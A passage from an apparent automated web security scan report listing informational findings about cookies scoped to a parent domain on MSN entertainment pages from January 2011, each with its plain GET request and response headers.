<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.189. http://social.entertainment.redacted/movies/blogs/videodrone-blog.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.entertainment.redacted
Path:   /movies/blogs/videodrone-blog.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /movies/blogs/videodrone-blog.aspx HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:53 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA53
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=95fdb1a67d8c452591b9b1d3553ca658; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=1219E6217C35489A85953685DFCF99E9; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:53 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 56969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.190. http://social.entertainment.redacted/movies/blogs/videodrone-blogpost.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.entertainment.redacted
Path:   /movies/blogs/videodrone-blogpost.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /movies/blogs/videodrone-blogpost.aspx HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:52 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=6d751073fa5b4121b2cd69496e39f021; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=8104721B1DA441FBA6658BE28078FA49; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:52 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 22912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.191. http://social.msdn.microsoft.com/Forums/en-US/windowsphone7series/threads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.msdn.microsoft.com
Path:   /Forums/en-US/windowsphone7series/threads

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Forums/en-US/windowsphone7series/threads HTTP/1.1
Host: social.msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
Set-Cookie: .ASPXANONYMOUS=_HXAcN3ezAEkAAAANTFiOTVkNDAtNzBkMy00OTlmLWIwYjgtMDcxN2MxMTZkMWFmbxOZ7JYQP3dzD3-g9V1k7zpmuBI1; expires=Sun, 29-Jan-2012 23:26:34 GMT; path=/; HttpOnly
Set-Cookie: msdn=L=1033; domain=.microsoft.com; expires=Mon, 28-Feb-2011 23:26:34 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB21
Date: Sat, 29 Jan 2011 23:26:34 GMT
Content-Length: 62798


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head
...[SNIP]...

16.192. http://specials.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:50:58 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA53
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=85e00d6e6f6c4a778e4031e134497c88; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=63CE5261B6254DBF87870C0B65E15402; domain=.redacted; expires=Thu, 18-Aug-2011 01:50:58 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 24408

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.193. http://specials.redacted/A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:21 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=47b7e33a132247bf8382137776d91eb8; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=6378AE381CF74C0AB0F61F11DCCB43D6; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:21 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17250

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.194. http://specials.redacted/A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:19 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a0e82ca105e74736bef180d33ad85b63; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=3D7690447A274FA6A7A5188FFB75CF63; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:19 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.195. http://specials.redacted/A-List/Entertainment/Famous-February-birthdays.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Entertainment/Famous-February-birthdays.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/Famous-February-birthdays.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=af42dcb823fb4382b27164e71b4553fa; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=14EF63B027F946CD907C6E5D6601CA44; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:26 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17056

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.196. http://specials.redacted/A-List/Entertainment/Jesse-James-ex-arrested.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Entertainment/Jesse-James-ex-arrested.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/Jesse-James-ex-arrested.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:22 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=d363cc0566a641bbac227c396c72e6da; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=B5C6E6CBBD8140B1A45E68CFF623563E; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:22 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.197. http://specials.redacted/A-List/Entertainment/PETAs-newest-naked-celeb.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Entertainment/PETAs-newest-naked-celeb.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/PETAs-newest-naked-celeb.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:15 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=ce8cf853b593429c8c5ae3125646c35b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=14CA8A1489AA49D39C1600720CAD343B; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:15 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.198. http://specials.redacted/A-List/Entertainment/Unlikely-celebrity-friendships.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Entertainment/Unlikely-celebrity-friendships.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Entertainment/Unlikely-celebrity-friendships.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:25 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=b8024ffbe31247238960e8dad42e6ae0; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=54B802C72C5D4A968AE6BEB7BEB43885; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:25 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.199. http://specials.redacted/A-List/Lifestyle/Billionaires-caucus.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Billionaires-caucus.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Billionaires-caucus.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:06 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA54
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=509e6c71b5ba480d910bf7b7e5f60afe; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=0BDAD1C110174CA4BA5911AED9744835; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:06 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.200. http://specials.redacted/A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:59 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=115826fb361947fba7a59745eee1a2fe; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=19D7523F04DB408783F64E4246E74057; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:59 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.201. http://specials.redacted/A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:10 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA50
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=686b26f612ef4ff886afcdf5b0daf95d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=64FF62872D864AAC8B7EAB35C97F487F; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:10 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.202. http://specials.redacted/A-List/Lifestyle/Egypt-new-vp.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Egypt-new-vp.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Egypt-new-vp.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:58 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=075506e27db2457ab39ca3349aad58aa; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=751919D3B46045639E5A7F4BB4D9E241; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:58 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.203. http://specials.redacted/A-List/Lifestyle/Famous-escapes.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Famous-escapes.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Famous-escapes.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:57 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA50
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=1609e5a58c494ff581dac6b56594c457; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=5969A2C4E44346D5AD9CAFB1687B8DC5; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:57 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.204. http://specials.redacted/A-List/Lifestyle/Mom-kills-teens.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Mom-kills-teens.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Mom-kills-teens.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:12 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=adae2bda89bb456997895c86d0995bea; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=606B6FED01FA4B74AC05FBCA266D2456; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:12 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.205. http://specials.redacted/A-List/Lifestyle/Nathan-Woods-dies.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Nathan-Woods-dies.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Nathan-Woods-dies.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:07 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=43c0ed9dcd59405e97e0ca56ecbc5934; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=E67F9D21403E45ABB6A08727A2CBE039; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:07 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17060

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.206. http://specials.redacted/A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx?cp-documentid=27453665 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:01 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=44c6713e16484bef8864fe79a72511ae; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=FCB994723662439EA7B8A5803A9422E2; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:01 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23610

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.207. http://specials.redacted/A-List/Lifestyle/Taco-Bell-fights-back.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Taco-Bell-fights-back.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Taco-Bell-fights-back.aspx?cp-documentid=27449852 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:02 GMT
Server: Microsoft-IIS/6.0
